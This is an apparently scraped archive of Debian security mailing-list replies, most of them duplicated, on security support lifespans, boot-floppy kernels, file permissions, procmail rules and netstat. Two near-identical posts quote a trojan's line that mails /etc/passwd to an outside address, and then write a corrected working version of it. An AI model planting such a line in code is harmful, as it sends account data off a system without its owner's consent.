Re: Security for woody after woody->sarge ?
On 11/06/04 01:28, Alex Owen wrote: Are there any plans to change the position stated at: http://www.debian.org/security/faq#lifespan "Q: How long will security updates be provided? A: The security team tries to support a stable distribution for about one year after the next stable distribution has been released, except when another stable distribution is released within this year. It is not possible to support three distributions; supporting two simultaneously is already difficult enough." I ask as I'm commisioning a woody system and cannot upgrade to sarge till July/August 2005 so I'll probably need a year of woody security updates. If Debian does not commit to supporting woody with security fixes after sarge is released does anyone have any ideas of where we could buy such support? If you are concerned that there might be another release within a year of Sarge then you can lay your fears to rest. It seems extremely unlikely. -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204
Re: Security for woody after woody->sarge ?
On 11/06/04 01:28, Alex Owen wrote: Are there any plans to change the position stated at: http://www.debian.org/security/faq#lifespan "Q: How long will security updates be provided? A: The security team tries to support a stable distribution for about one year after the next stable distribution has been released, except when another stable distribution is released within this year. It is not possible to support three distributions; supporting two simultaneously is already difficult enough." I ask as I'm commisioning a woody system and cannot upgrade to sarge till July/August 2005 so I'll probably need a year of woody security updates. If Debian does not commit to supporting woody with security fixes after sarge is released does anyone have any ideas of where we could buy such support? If you are concerned that there might be another release within a year of Sarge then you can lay your fears to rest. It seems extremely unlikely. -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: BF kernels
On 15/04/04 22:19, Joshua Goodall wrote: On Thu, 15 Apr 2004 07:56 pm, Tim Nicholas wrote: If I recall correctly it is assumed that users will not run on the boot floppy kernels after the initial system installation. They are expected to install a more appropriate kernel after finishing the install. As such there will be no patch for the boot floppy kernel. I disagree with the generalisation. Let me tell you two little tales. 1. A few weeks ago I was building a new cluster of our servers. We [snip] The specifics of DSA479 notwithstanding; either of these would motivate me to agree with Michelle that bootfloppies should be updated, too. I couldn't agree more. -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204
Re: BF kernels
On 15/04/04 22:19, Joshua Goodall wrote: On Thu, 15 Apr 2004 07:56 pm, Tim Nicholas wrote: If I recall correctly it is assumed that users will not run on the boot floppy kernels after the initial system installation. They are expected to install a more appropriate kernel after finishing the install. As such there will be no patch for the boot floppy kernel. I disagree with the generalisation. Let me tell you two little tales. 1. A few weeks ago I was building a new cluster of our servers. We [snip] The specifics of DSA479 notwithstanding; either of these would motivate me to agree with Michelle that bootfloppies should be updated, too. I couldn't agree more. -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [DSA 479-2] New Linux 2.4.18 packages fix local root exploit (i386)
On 04/15/04 20:05, Michelle Konzack wrote: Question: What about the Bootfloppies ? Many bad Debian $USER using the bf24 as there standard Kernel and do not replace it with an other kernel flavor... The Boot-Disks are not updated since 21.05.2002... Greetings Michelle If I recall correctly it is assumed that users will not run on the boot floppy kernels after the initial system installation. They are expected to install a more appropriate kernel after finishing the install. As such there will be no patch for the boot floppy kernel. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204
Re: [DSA 479-2] New Linux 2.4.18 packages fix local root exploit (i386)
On 04/15/04 20:05, Michelle Konzack wrote: Question: What about the Bootfloppies ? Many bad Debian $USER using the bf24 as there standard Kernel and do not replace it with an other kernel flavor... The Boot-Disks are not updated since 21.05.2002... Greetings Michelle If I recall correctly it is assumed that users will not run on the boot floppy kernels after the initial system installation. They are expected to install a more appropriate kernel after finishing the install. As such there will be no patch for the boot floppy kernel. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: passwords changed?
On 04/11/04 21:15, LeVA wrote: 2004. április 11. 06:21 dátummal Noah Meyerhans ezt írta: On Sat, Apr 10, 2004 at 09:19:00PM +0200, LeVA wrote: Only as ftp. But there have been a number of locally exploitable kernel vulnerabilities fairly recently, and an attacker could use one of these to obtain root access once they had shell access as a non-root user. Are you running a safe kernel? noah I always compile the latest stable 2.4 kernel with loadable modules disabled, but I don't apply any kernel patches. Is this "safe", or I must apply some security patch? Thanks! Daniel The 2.4.25 is 'safe'. -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204
Re: passwords changed?
On 04/11/04 21:15, LeVA wrote: 2004. április 11. 06:21 dátummal Noah Meyerhans ezt írta: On Sat, Apr 10, 2004 at 09:19:00PM +0200, LeVA wrote: Only as ftp. But there have been a number of locally exploitable kernel vulnerabilities fairly recently, and an attacker could use one of these to obtain root access once they had shell access as a non-root user. Are you running a safe kernel? noah I always compile the latest stable 2.4 kernel with loadable modules disabled, but I don't apply any kernel patches. Is this "safe", or I must apply some security patch? Thanks! Daniel The 2.4.25 is 'safe'. -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: secure file permissions
mi wrote: Hello, Can you tell me what are the default permissions for /etc/group and /etc/passwd ? I restricted them to rw for root only, but some things like exim (and possibly dpkg ?) seem to need read access there too. What's recommendet ? (Debian Woody 3.0 r1) $ ls -l /etc/passwd -rw-r--r--1 root root 2722 Nov 23 15:35 /etc/passwd $ same for group. Pretty much everything needs to be able to read them. There isn't any harm in having them readable either. The encrypted passwords are stored in /etc/shadow. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204
Re: secure file permissions
mi wrote: Hello, Can you tell me what are the default permissions for /etc/group and /etc/passwd ? I restricted them to rw for root only, but some things like exim (and possibly dpkg ?) seem to need read access there too. What's recommendet ? (Debian Woody 3.0 r1) $ ls -l /etc/passwd -rw-r--r--1 root root 2722 Nov 23 15:35 /etc/passwd $ same for group. Pretty much everything needs to be able to read them. There isn't any harm in having them readable either. The encrypted passwords are stored in /etc/shadow. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Will 2.4.20 Source be patched for the latest kernel vulnerability?
Rick Moen wrote: Quoting Riku Valli ([EMAIL PROTECTED]): How about boot floppies kernel? Kernel-image-2.4.18-bf2.4 which is default kernel for woody. Default _installation_ kernel. My understanding is that it's expected you'd apt-get install an image suitable to your hardware at the end of installation. That may be expected, but I would bet good money that it's not actually the case. I suspect that over 50% of debian installs use the default installation kernel until there is some good reason to change it (ie, something doesn't work). Of course, I might be totally wrong. I never use debian kernels. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204
Re: Will 2.4.20 Source be patched for the latest kernel vulnerability?
Rick Moen wrote: Quoting Riku Valli ([EMAIL PROTECTED]): How about boot floppies kernel? Kernel-image-2.4.18-bf2.4 which is default kernel for woody. Default _installation_ kernel. My understanding is that it's expected you'd apt-get install an image suitable to your hardware at the end of installation. That may be expected, but I would bet good money that it's not actually the case. I suspect that over 50% of debian installs use the default installation kernel until there is some good reason to change it (ie, something doesn't work). Of course, I might be totally wrong. I never use debian kernels. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [OT] Re: unsubscribe - Procmail Rule
On Fri, Apr 25, 2003 at 10:55:15PM -0400, Phillip Hofmeister wrote: > Can anynone enlighten me why my rule didn't catch this message? > > :0 > * ^X-Mailing-List:[EMAIL PROTECTED] > * ^Subject: .{0,2}sub.{1,5}ibe > /dev/null You might have to escape the { and }. * ^Subject: .\{0,2\}sub.\{1,5\}ibe Why not just have * ^Subject: .\{0,2\}subscribe ? Tim > > -- Tim Nicholas || ICQ# 15869961 Email: [EMAIL PROTECTED]|| Cell/SMS: +64 21 337 204 http://tim.nicholas.net.nz/ ||Wellington, New Zealand "Sir, I think you have a problem with your brain being missing."
Oops. Apologies to all.
Oops. I'm VERY sorry everyone. I just did something really stupid with my mail system and ended up sending messages to everyone whos email addresses I filter in anyway. If you have received messages from [EMAIL PROTECTED] with the subject 'This is a test' or from 'jillgreen' subject 'Hi' or from 'Sarah' subject 'story for the arthritis mag' then you have my whole hearted apologies. This is what I get for playing with new mail software without due care. Mail me if you want a more complete explanation of what happened. Once again, I am very sorry for the confusion/inconvenience. Yours, Tim Nicholas -- Tim Nicholas || ICQ# 15869961 Email: [EMAIL PROTECTED]|| Cell/SMS: +64 21 337 204 http://tim.nicholas.net.nz/ ||Wellington, New Zealand
Re: Disabling netstat
Hello, nmap wont tell you the same information as netstat. netstat will say what connections are in place between the localhost and remote hosts, and what state they are in. It'll also tell you what ports there are servers listening on. That's somthing that nmap could tell you, but that's very public information anyway. This is really a matter of limiting the extent to which you are forced to trust the other users of a system. The example of restricting netstat seems to be about not allowing other users to know what network nodes are being communicated with because it could be considered personal information. Just as userA shouldn't be able to see who userB has been emailing. Thats my 2c anyway. Tim On Mon, Apr 21, 2003 at 02:37:10PM +0200, Markus Kolb wrote: > Brian McGroarty wrote: > > >This sure seems kind of silly... why add all these things into Big > >Giant Namespace and not honor all of the conventions of the same? I > >think /proc/* not supporting chmod changes for the duration of a > >system's uptime could be classified as a bug or a major design > >flaw. :/ > > I say it's the 2nd. It was never the idea in Linux to limit the basic > system tools to a few users only. > Of course it is possible. Perhaps it would be a good idea to implement > such security in one of the next kernel versions. > Many kernel hackers will call it security by obscurity. > With a correct installation and setup there is no problem when normal > users can get information out of procfs. > Especially disabling netstat with procfs is not the best idea. There are > possibilities to get much information without procfs. In my thoughts are > utilities like nmap. > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > -- Tim Nicholas || ICQ# 15869961 Email: [EMAIL PROTECTED]|| Cell/SMS: +64 21 337 204 http://tim.nicholas.net.nz/ ||Wellington, New Zealand "Sir, I think you have a problem with your brain being missing."
Re: [Fwd: Re: LWN: Ptrace vulnerability in 2.2 and 2.4 kernels]
On Wed, Apr 02, 2003 at 09:46:52AM +0200, Dariush Pietrzak wrote: > > of proportion... Some things in security _have_ to be obscure. Your > > password, for example. Or the primes used to generate your PGP private > There's a difference between 'obscure' and 'secret'. This is true. > All you gain by removing kernel-loading capability from your kernel is to > force cracker to search memory to find entry points. > That's like hiding key to your door under your doormat. Thats not true. Or rather if it is, then using the key is considerably harder than simply opening the door (which would be equivalent of having module support using your metaphor). But disabling module support isn't obscuring anything, its genuinely changing the system. The attacker is in fact going to have to do something different and more difficult to modify the kernel. You seem to be saying that if there is one way of achieving a security breach, then you shouldn't bother stopping other ways of achieving the same result. This is clearly ridiculas. Yours, Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 "Sir, I think you have a problem with your brain being missing."
Re: [Fwd: Re: LWN: Ptrace vulnerability in 2.2 and 2.4 kernels]
On Wed, Apr 02, 2003 at 09:46:52AM +0200, Dariush Pietrzak wrote: > > of proportion... Some things in security _have_ to be obscure. Your > > password, for example. Or the primes used to generate your PGP private > There's a difference between 'obscure' and 'secret'. This is true. > All you gain by removing kernel-loading capability from your kernel is to > force cracker to search memory to find entry points. > That's like hiding key to your door under your doormat. Thats not true. Or rather if it is, then using the key is considerably harder than simply opening the door (which would be equivalent of having module support using your metaphor). But disabling module support isn't obscuring anything, its genuinely changing the system. The attacker is in fact going to have to do something different and more difficult to modify the kernel. You seem to be saying that if there is one way of achieving a security breach, then you shouldn't bother stopping other ways of achieving the same result. This is clearly ridiculas. Yours, Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]||Wellington, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 337 204 "Sir, I think you have a problem with your brain being missing." -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Netstat port list v/s PID
Have a look at the -p option in netstat. Tim On Thu, Oct 10, 2002 at 09:36:48AM +0400, Hantzley wrote: > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Hi, > Is there a way to know to which process belong a particular port? e.g., > port 32773 - 32779, are known to be for rpc services. But to which process > do they pertain to, that's another issue? > > Your comments and ideas are the most welcome. > > Thank you, > > Hantzley > -BEGIN PGP SIGNATURE- > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> > > iQA/AwUBPaUR8AYMAbLGe5rXEQKZ7wCg3GzEdTcKGv2yWh+IlDNa3YiHSmcAoJra > FEto+d49xK4pZVI3CuCcw5z/ > =MM5Z > -END PGP SIGNATURE- > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| Dunedin, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 113 0399
Re: Netstat port list v/s PID
Have a look at the -p option in netstat. Tim On Thu, Oct 10, 2002 at 09:36:48AM +0400, Hantzley wrote: > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Hi, > Is there a way to know to which process belong a particular port? e.g., > port 32773 - 32779, are known to be for rpc services. But to which process > do they pertain to, that's another issue? > > Your comments and ideas are the most welcome. > > Thank you, > > Hantzley > -BEGIN PGP SIGNATURE- > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> > > iQA/AwUBPaUR8AYMAbLGe5rXEQKZ7wCg3GzEdTcKGv2yWh+IlDNa3YiHSmcAoJra > FEto+d49xK4pZVI3CuCcw5z/ > =MM5Z > -END PGP SIGNATURE- > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| Dunedin, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 113 0399 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Report on last cmd
Those lines indicate that people have been logging in to your machine via anonymous ftp. Also, your clock is fast! October 5 is only just starting, and I'm in New Zealand (we get the new day first). Tim On Fri, Oct 04, 2002 at 07:03:21PM +0800, Glen Tapley wrote: > Hello > > I have been having a lot of trouble with my sendmail setup, someone is using > my system. I have found that when I run the last cmd, I find a lot of strange > entries such as > > ftp ftp p50852BD8.dip.t- Sun Oct 6 03:57 - 03:57 (00:00) > ftp ftp p508ECDDA.dip.t- Sun Oct 6 03:37 - 03:37 (00:00) > ftp ftp 212.171.38.1 Sat Oct 5 23:16 - 23:16 (00:00) > ftp ftp 210.23.10.25 Sat Oct 5 18:40 - 18:40 (00:00) > > Can anyone tell me what these are, are they the result of programs accessing > my TCP/IP addresses? > > Tx in advance. > > glt > -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| Dunedin, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 113 0399
Re: Report on last cmd
Those lines indicate that people have been logging in to your machine via anonymous ftp. Also, your clock is fast! October 5 is only just starting, and I'm in New Zealand (we get the new day first). Tim On Fri, Oct 04, 2002 at 07:03:21PM +0800, Glen Tapley wrote: > Hello > > I have been having a lot of trouble with my sendmail setup, someone is using my >system. I have found that when I run the last cmd, I find a lot of strange entries >such as > > ftp ftp p50852BD8.dip.t- Sun Oct 6 03:57 - 03:57 (00:00) > ftp ftp p508ECDDA.dip.t- Sun Oct 6 03:37 - 03:37 (00:00) > ftp ftp 212.171.38.1 Sat Oct 5 23:16 - 23:16 (00:00) > ftp ftp 210.23.10.25 Sat Oct 5 18:40 - 18:40 (00:00) > > Can anyone tell me what these are, are they the result of programs accessing my >TCP/IP addresses? > > Tx in advance. > > glt > -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| Dunedin, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 113 0399 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: DSA-134-1
Hi, One would have to point out that though they haven't released anything specific yet, they say that they will, and there are real reasons for not telling the world without providing sufficient warning to get systems at least partially protected. Sure that might be in some ways inconsistent with their stated policy but if they do release all the information next week (as I think they have said they will) then (probably) they have gone about it in as good a way as they could really be expected to. As I understand it, the normal way for vendors to do this would have been to wait until next week before saying anything at all. Probably that would have been a clearer course of action as we wouldn't know about it until a fix was available. No nervous week of waiting, but also an extra week with a 'known' and presumably very serious security whole in all our systems. I don't like either of those options, but I'm inclined to think that being given an opportunity to do preemptive damage control is a Good Thing. On the other hand I agree with you entirely about Theo. He is my only problem with the OpenBSD project. Tim On Tue, Jun 25, 2002 at 12:40:44PM +0200, Robert van der Meulen wrote: > > Quoting Paul Haesler ([EMAIL PROTECTED]): > > Doesn't OpenBSD have a full-disclosure policy anyway? > > It has 'listen to theo or fuck off' disclosure policy, which basically means > you have to do what theo says, and no matter what you do, you'll end up with > problems and bitching, and disclosure is only done when it doesn't affect > openbsd (or the '5 years without..' line on openbsd.org). > > Greets, > Robert > -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| Dunedin, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 113 0399 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Updated Apache packages for testing?
Hi, You did remember to do an update didn't you? What version of the package do you have installed? $ dpkg -l apache Tim On Sat, Jun 22, 2002 at 01:22:19PM +, Martin WHEELER wrote: > On Sat, 22 Jun 2002, Alain Tesio wrote: > > > I've installed unstable packages on woody, it runs fine. > > > > apt-get -t unstable install apache apache-common > > [EMAIL PROTECTED]:~# apt-get -t unstable install apache apache-common > Reading Package Lists... Done > Building Dependency Tree... Done > Sorry, apache is already the newest version. > Sorry, apache-common is already the newest version. > 0 packages upgraded, 0 newly installed, 0 to remove and 30 not > upgraded. > [EMAIL PROTECTED]:~# apache -v > Server version: Apache/1.3.24 (Unix) Debian GNU/Linux > Server built: Apr 30 2002 06:00:09 > [EMAIL PROTECTED]:~# > -- > Martin Wheeler <[EMAIL PROTECTED]> gpg key 01269BEB @ the.earth.li > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| Dunedin, New Zealand http://tim.nicholas.net.nz/ || Cell/SMS: +64 21 113 0399 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 03:31:17PM -0700, Anne Carasik wrote: > On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote: > > > Compile from source is a good idea too. It's amazing what you > > > can find in the source. I found a couple of stupid Trojans > > > that way. > > >system("mail /etc/passwd [EMAIL PROTECTED]"); > > Yeh, and it's buggy too > > Take a close look at what really happens. > > I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;) > > Seriously, I know it is. The other thing is, I use shadow most of the > time. Still, the username information is never a good thing to share. > I think he is saying that it should be somthing more like system("mail [EMAIL PROTECTED] < /etc/passwd"); But since i dont really know c, you might not be able to use '<' in system calls... it seems likey though. The previous version would try to email user /etc/passwd. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| ICQ# 15869961 http://tim.nicholas.net.nz/ || Dunedin, New Zealand "Grow up, Larry. You give me too much credit." - Linus Torvalds -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 03:31:17PM -0700, Anne Carasik wrote: > On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote: > > > Compile from source is a good idea too. It's amazing what you > > > can find in the source. I found a couple of stupid Trojans > > > that way. > > >system("mail /etc/passwd [EMAIL PROTECTED]"); > > Yeh, and it's buggy too > > Take a close look at what really happens. > > I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;) > > Seriously, I know it is. The other thing is, I use shadow most of the > time. Still, the username information is never a good thing to share. > I think he is saying that it should be somthing more like system("mail [EMAIL PROTECTED] < /etc/passwd"); But since i dont really know c, you might not be able to use '<' in system calls... it seems likey though. The previous version would try to email user /etc/passwd. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| ICQ# 15869961 http://tim.nicholas.net.nz/ || Dunedin, New Zealand "Grow up, Larry. You give me too much credit." - Linus Torvalds -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]